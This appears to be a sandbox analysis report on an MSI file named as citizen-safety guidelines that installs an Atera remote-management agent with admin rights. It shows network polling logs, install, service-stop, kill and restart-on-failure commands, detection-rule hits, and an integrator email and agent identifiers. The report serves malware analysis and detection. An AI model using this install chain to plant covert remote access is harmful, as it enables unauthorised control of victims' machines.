2024-11-24 10:17:15 UTC | 354 | OUT | GET /v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/2094f497-2e94-42f0-b27c-add7e377a9d2/leave?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=c2794a63-4cce-452a-a323-b26bf4d17cfd&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json
Host: ps.pndsn.com
2024-11-24 10:17:16 UTC | 322 | IN | HTTP/1.1 200 OK
Date: Sun, 24 Nov 2024 10:17:16 GMT
Content-Type: text/javascript; charset="UTF-8"
Content-Length: 74
Connection: close
Access-Control-Allow-Methods: OPTIONS, GET, POST
Age: 0
Cache-Control: no-cache
Accept-Ranges: bytes
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers: *
2024-11-24 10:17:16 UTC | 74 | IN | Data Ascii: {"status": 200, "message": "OK", "action": "leave", "service": "Presence"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.7 | 50034 | 13.232.67.198 | 443 | 6216 | C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-24 10:17:16 UTC | 159 | OUT | GET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=3a79d35f-3aae-426f-91c8-7d16143c1d7a&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
Host: ps.pndsn.com
2024-11-24 10:17:16 UTC | 242 | IN | HTTP/1.1 200 OK
Date: Sun, 24 Nov 2024 10:17:16 GMT
Content-Type: text/javascript; charset="UTF-8"
Connection: close
Content-Length: 19
Cache-Control: no-cache
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers: *
2024-11-24 10:17:16 UTC | 19 | IN | Data Ascii: [17324434364820384]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.7 | 50041 | 13.232.67.198 | 443 | 6216 | C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-24 10:17:18 UTC | 362 | OUT | GET /v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094f497-2e94-42f0-b27c-add7e377a9d2/0?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=ebb1f16f-c11d-4880-8816-8b8ea69a0ee1&tr=31&tt=17324434182234301&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json
Host: ps.pndsn.com
2024-11-24 10:17:19 UTC | 279 | IN | HTTP/1.1 200 OK
Date: Sun, 24 Nov 2024 10:17:18 GMT
Content-Type: text/javascript; charset="UTF-8"
Content-Length: 1864
Connection: close
Cache-Control: no-cache
Access-Control-Allow-Methods: GET
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers: *
2024-11-24 10:17:19 UTC | 1864 | IN | Data Ascii: {"t":{"t":"17324434351531129","r":31},"m":[{"a":"2","f":0,"i":"8291bf2a-31a2-4f47-8bd6-1509def0dd98","p":{"t":"17324434351531129","r":42},"k":"sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f","c":"2094f497-2e94-42f0-b27c-add7e377a9d2","d":{"CommandId":"a6f6386


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.7 | 50044 | 13.232.67.198 | 443 | 6216 | C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-24 10:17:19 UTC | 358 | OUT | GET /v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/2094f497-2e94-42f0-b27c-add7e377a9d2/heartbeat?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=f3cbab58-b709-46f1-9320-2a47ceb98572&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json
Host: ps.pndsn.com
2024-11-24 10:17:19 UTC | 322 | IN | HTTP/1.1 200 OK
Date: Sun, 24 Nov 2024 10:17:19 GMT
Content-Type: text/javascript; charset="UTF-8"
Content-Length: 55
Connection: close
Access-Control-Allow-Methods: OPTIONS, GET, POST
Age: 0
Cache-Control: no-cache
Accept-Ranges: bytes
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers: *
2024-11-24 10:17:19 UTC | 55 | IN | Data Ascii: {"status": 200, "message": "OK", "service": "Presence"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.7 | 50053 | 13.232.67.198 | 443 | 6216 | C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-24 10:17:21 UTC | 159 | OUT | GET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=7cbe7b17-7f3f-4c8d-9d62-c19102ed6fde&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
Host: ps.pndsn.com
2024-11-24 10:17:22 UTC | 242 | IN | HTTP/1.1 200 OK
Date: Sun, 24 Nov 2024 10:17:22 GMT
Content-Type: text/javascript; charset="UTF-8"
Connection: close
Content-Length: 19
Cache-Control: no-cache
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers: *
2024-11-24 10:17:22 UTC | 19 | IN | Data Ascii: [17324434420027741]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.7 | 50057 | 13.232.67.198 | 443 | 6216 | C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-24 10:17:22 UTC | 358 | OUT | GET /v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/2094f497-2e94-42f0-b27c-add7e377a9d2/heartbeat?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=e037a3ed-5082-482a-83de-1fb0a079a164&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json
Host: ps.pndsn.com
2024-11-24 10:17:22 UTC | 322 | IN | HTTP/1.1 200 OK
Date: Sun, 24 Nov 2024 10:17:22 GMT
Content-Type: text/javascript; charset="UTF-8"
Content-Length: 55
Connection: close
Access-Control-Allow-Methods: OPTIONS, GET, POST
Age: 0
Cache-Control: no-cache
Accept-Ranges: bytes
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers: *
2024-11-24 10:17:22 UTC | 55 | IN | Data Ascii: {"status": 200, "message": "OK", "service": "Presence"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.7 | 50061 | 13.232.67.198 | 443 | 6216 | C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-24 10:17:24 UTC | 362 | OUT | GET /v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094f497-2e94-42f0-b27c-add7e377a9d2/0?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=5c21410a-40ef-453f-8c5e-f80e3c3a9e9b&tr=31&tt=17324434351531129&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json
Host: ps.pndsn.com
2024-11-24 10:17:25 UTC | 279 | IN | HTTP/1.1 200 OK
Date: Sun, 24 Nov 2024 10:17:24 GMT
Content-Type: text/javascript; charset="UTF-8"
Content-Length: 1854
Connection: close
Cache-Control: no-cache
Access-Control-Allow-Methods: GET
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers: *
2024-11-24 10:17:25 UTC | 1854 | IN | Data Ascii: {"t":{"t":"17324434415236874","r":31},"m":[{"a":"2","f":0,"i":"f1c7b405-cda8-4d87-a0fb-98baca7fce4d","p":{"t":"17324434415236874","r":42},"k":"sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f","c":"2094f497-2e94-42f0-b27c-add7e377a9d2","d":{"CommandId":"975016c


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.7 | 50066 | 13.232.67.198 | 443 | 6216 | C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-24 10:17:25 UTC | 159 | OUT | GET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=03f53b61-ad6b-486d-8509-b0e195faf765&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
Host: ps.pndsn.com
2024-11-24 10:17:26 UTC | 242 | IN | HTTP/1.1 200 OK
Date: Sun, 24 Nov 2024 10:17:26 GMT
Content-Type: text/javascript; charset="UTF-8"
Connection: close
Content-Length: 19
Cache-Control: no-cache
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers: *
2024-11-24 10:17:26 UTC | 19 | IN | Data Ascii: [17324434460345756]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.7 | 50078 | 13.232.67.198 | 443 | 6216 | C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-24 10:17:29 UTC | 159 | OUT | GET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=21b072dc-59f8-4574-823e-a233b13880ce&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
Host: ps.pndsn.com
2024-11-24 10:17:30 UTC | 242 | IN | HTTP/1.1 200 OK
Date: Sun, 24 Nov 2024 10:17:29 GMT
Content-Type: text/javascript; charset="UTF-8"
Connection: close
Content-Length: 19
Cache-Control: no-cache
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers: *
2024-11-24 10:17:30 UTC | 19 | IN | Data Raw: 5b 31 37 33 32 34 34 33 34 34 39 39 34 37 37 30 32 35 5d
Data Ascii: [17324434499477025]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.7 | 50073 | 13.232.67.198 | 443 | 6216 | C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-24 10:17:29 UTC | 358 | OUT | GET /v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/2094f497-2e94-42f0-b27c-add7e377a9d2/heartbeat?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=326c90ae-c5b0-4a74-aa79-71ed3289b5e6&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json
Host: ps.pndsn.com
2024-11-24 10:17:30 UTC | 322 | IN | HTTP/1.1 200 OK
Date: Sun, 24 Nov 2024 10:17:29 GMT
Content-Type: text/javascript; charset="UTF-8"
Content-Length: 55
Connection: close
Access-Control-Allow-Methods: OPTIONS, GET, POST
Age: 7
Cache-Control: no-cache
Accept-Ranges: bytes
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers: *
2024-11-24 10:17:30 UTC | 55 | IN | Data Raw: 7b 22 73 74 61 74 75 73 22 3a 20 32 30 30 2c 20 22 6d 65 73 73 61 67 65 22 3a 20 22 4f 4b 22 2c 20 22 73 65 72 76 69 63 65 22 3a 20 22 50 72 65 73 65 6e 63 65 22 7d
Data Ascii: {"status": 200, "message": "OK", "service": "Presence"}


Session ID | Source IP | Source Port | Destination IP | Destination Port
34 | 192.168.2.7 | 50081 | 13.232.67.198 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-24 10:17:32 UTC | 358 | OUT | GET /v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/2094f497-2e94-42f0-b27c-add7e377a9d2/heartbeat?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=1be45d8e-3b2c-4ea5-a5b7-07647d59b850&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json
Host: ps.pndsn.com
2024-11-24 10:17:33 UTC | 323 | IN | HTTP/1.1 200 OK
Date: Sun, 24 Nov 2024 10:17:32 GMT
Content-Type: text/javascript; charset="UTF-8"
Content-Length: 55
Connection: close
Access-Control-Allow-Methods: OPTIONS, GET, POST
Age: 19
Cache-Control: no-cache
Accept-Ranges: bytes
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers: *
2024-11-24 10:17:33 UTC | 55 | IN | Data Raw: 7b 22 73 74 61 74 75 73 22 3a 20 32 30 30 2c 20 22 6d 65 73 73 61 67 65 22 3a 20 22 4f 4b 22 2c 20 22 73 65 72 76 69 63 65 22 3a 20 22 50 72 65 73 65 6e 63 65 22 7d
Data Ascii: {"status": 200, "message": "OK", "service": "Presence"}


Session ID | Source IP | Source Port | Destination IP | Destination Port
35 | 192.168.2.7 | 50083 | 13.232.67.198 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-24 10:17:35 UTC | 159 | OUT | GET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=50d6fee0-b13e-4824-8baa-cb59cf186680&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
Host: ps.pndsn.com
2024-11-24 10:17:35 UTC | 242 | IN | HTTP/1.1 200 OK
Date: Sun, 24 Nov 2024 10:17:35 GMT
Content-Type: text/javascript; charset="UTF-8"
Connection: close
Content-Length: 19
Cache-Control: no-cache
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers: *
2024-11-24 10:17:35 UTC | 19 | IN | Data Raw: 5b 31 37 33 32 34 34 33 34 35 35 33 30 33 38 32 38 34 5d
Data Ascii: [17324434553038284]


Session ID | Source IP | Source Port | Destination IP | Destination Port
36 | 192.168.2.7 | 50087 | 13.232.67.198 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-24 10:17:37 UTC | 340 | OUT | GET /v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094f497-2e94-42f0-b27c-add7e377a9d2/0?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=a0a85a46-f9d7-4b43-9103-c66ecd6f79b0&tt=0&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json
Host: ps.pndsn.com
2024-11-24 10:17:38 UTC | 277 | IN | HTTP/1.1 200 OK
Date: Sun, 24 Nov 2024 10:17:38 GMT
Content-Type: text/javascript; charset="UTF-8"
Content-Length: 45
Connection: close
Cache-Control: no-cache
Access-Control-Allow-Methods: GET
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers: *
2024-11-24 10:17:38 UTC | 45 | IN | Data Raw: 7b 22 74 22 3a 7b 22 74 22 3a 22 31 37 33 32 34 34 33 34 34 31 35 32 33 36 38 37 34 22 2c 22 72 22 3a 33 31 7d 2c 22 6d 22 3a 5b 5d 7d
Data Ascii: {"t":{"t":"17324434415236874","r":31},"m":[]}


                                                                                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                                                                                          Start time:05:15:20
                                                                                                                                                                                                                                                                          Start date:24/11/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\msiexec.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\Guidelines_for_Citizen_Safety.msi"
Imagebase:0x7ff75f4c0000
File size:69'632 bytes
MD5 hash:E5DA170027542E25EDE42FC54C929077
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:2
Start time:05:15:20
Start date:24/11/2024
Path:C:\Windows\System32\msiexec.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\msiexec.exe /V
Imagebase:0x7ff75f4c0000
File size:69'632 bytes
MD5 hash:E5DA170027542E25EDE42FC54C929077
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:false

Target ID:3
Start time:05:15:21
Start date:24/11/2024
Path:C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):true
Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding DA0792725E6113A4C2EFC78428B5F22F
Imagebase:0xc30000
File size:59'904 bytes
MD5 hash:9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:4
Start time:05:15:21
Start date:24/11/2024
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:rundll32.exe "C:\Windows\Installer\MSI6A36.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_7105375 2 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.GenerateAgentId
Imagebase:0x7f0000
File size:61'440 bytes
MD5 hash:889B99C52A60DD49227C5E485A016679
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000004.00000003.1382870012.0000000004726000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:high
Has exited:true

Target ID:5
Start time:05:15:22
Start date:24/11/2024
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:rundll32.exe "C:\Windows\Installer\MSI7013.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_7106625 6 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiStart
Imagebase:0x7f0000
File size:61'440 bytes
MD5 hash:889B99C52A60DD49227C5E485A016679
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000005.00000003.1394167510.00000000049D8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000005.00000002.1451460309.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000005.00000002.1451460309.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:high
Has exited:true

Target ID:6
Start time:05:15:28
Start date:24/11/2024
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:rundll32.exe "C:\Windows\Installer\MSI87B3.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_7112656 11 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ShouldContinueInstallation
Imagebase:0x7f0000
File size:61'440 bytes
MD5 hash:889B99C52A60DD49227C5E485A016679
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000006.00000003.1454680020.0000000004119000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:high
Has exited:true

Target ID:7
Start time:05:15:29
Start date:24/11/2024
Path:C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):true
Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding F2302B5C45E6CFD0540EEC21654A91D9 E Global\MSI0000
Imagebase:0xc30000
File size:59'904 bytes
MD5 hash:9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:8
Start time:05:15:29
Start date:24/11/2024
Path:C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):true
Commandline:"NET" STOP AteraAgent
Imagebase:0x330000
File size:47'104 bytes
MD5 hash:31890A7DE89936F922D44D677F681A7F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

                                                                                                                                                                                                                                                                          Target ID:9
                                                                                                                                                                                                                                                                          Start time:05:15:29
                                                                                                                                                                                                                                                                          Start date:24/11/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                          Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          Target ID:10
                                                                                                                                                                                                                                                                          Start time:05:15:29
                                                                                                                                                                                                                                                                          Start date:24/11/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\net1 STOP AteraAgent
                                                                                                                                                                                                                                                                          Imagebase:0xd90000
                                                                                                                                                                                                                                                                          File size:139'776 bytes
                                                                                                                                                                                                                                                                          MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          Target ID:11
                                                                                                                                                                                                                                                                          Start time:05:15:30
                                                                                                                                                                                                                                                                          Start date:24/11/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:"TaskKill.exe" /f /im AteraAgent.exe
                                                                                                                                                                                                                                                                          Imagebase:0xd20000
                                                                                                                                                                                                                                                                          File size:74'240 bytes
                                                                                                                                                                                                                                                                          MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          Target ID:12
                                                                                                                                                                                                                                                                          Start time:05:15:30
                                                                                                                                                                                                                                                                          Start date:24/11/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                          Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          Target ID:13
                                                                                                                                                                                                                                                                          Start time:05:15:32
                                                                                                                                                                                                                                                                          Start date:24/11/2024
                                                                                                                                                                                                                                                                          Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" /i /IntegratorLogin="paul.fraxom@yzistanbul.me" /CompanyId="1" /IntegratorLoginUI="" /CompanyIdUI="" /FolderId="" /AccountId="001Q300000Kso2pIAB" /AgentId="2094f497-2e94-42f0-b27c-add7e377a9d2"
                                                                                                                                                                                                                                                                          Imagebase:0x158ec7a0000
                                                                                                                                                                                                                                                                          File size:145'968 bytes
                                                                                                                                                                                                                                                                          MD5 hash:477293F80461713D51A98A24023D45E8
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe, Author: Joe Security
                                                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                                                          • Detection: 26%, ReversingLabs
                                                                                                                                                                                                                                                                          Has exited:true

Target ID:15
Start time:05:15:37
Start date:24/11/2024
Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe"
Imagebase:0x18896d70000
File size:145'968 bytes
MD5 hash:477293F80461713D51A98A24023D45E8
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
Has exited:false

Target ID:16
Start time:05:15:38
Start date:24/11/2024
Path:C:\Windows\System32\sc.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
Imagebase:0x7ff74f230000
File size:72'192 bytes
MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:17
Start time:05:15:38
Start date:24/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7b4ee0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:18
Start time:05:15:38
Start date:24/11/2024
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:rundll32.exe "C:\Windows\Installer\MSIA9F5.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_7121500 33 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiEnd
Imagebase:0x7f0000
File size:61'440 bytes
MD5 hash:889B99C52A60DD49227C5E485A016679
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000012.00000003.1543865163.00000000044B9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000012.00000002.1601257080.00000000047E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000012.00000002.1601257080.0000000004887000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:true

                                                                                                                                                                                                                                                                          Target ID:19
                                                                                                                                                                                                                                                                          Start time:05:15:58
                                                                                                                                                                                                                                                                          Start date:24/11/2024
                                                                                                                                                                                                                                                                          Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 2094f497-2e94-42f0-b27c-add7e377a9d2 "6be74508-e40c-4e94-a6e8-129eac28e456" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000Kso2pIAB
                                                                                                                                                                                                                                                                          Imagebase:0x2ac4fe20000
                                                                                                                                                                                                                                                                          File size:177'704 bytes
                                                                                                                                                                                                                                                                          MD5 hash:FD9DF72620BCA7C4D48BC105C89DFFD2
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe, Author: Joe Security
                                                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                                                          • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          Target ID:20
                                                                                                                                                                                                                                                                          Start time:05:15:58
                                                                                                                                                                                                                                                                          Start date:24/11/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                          Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
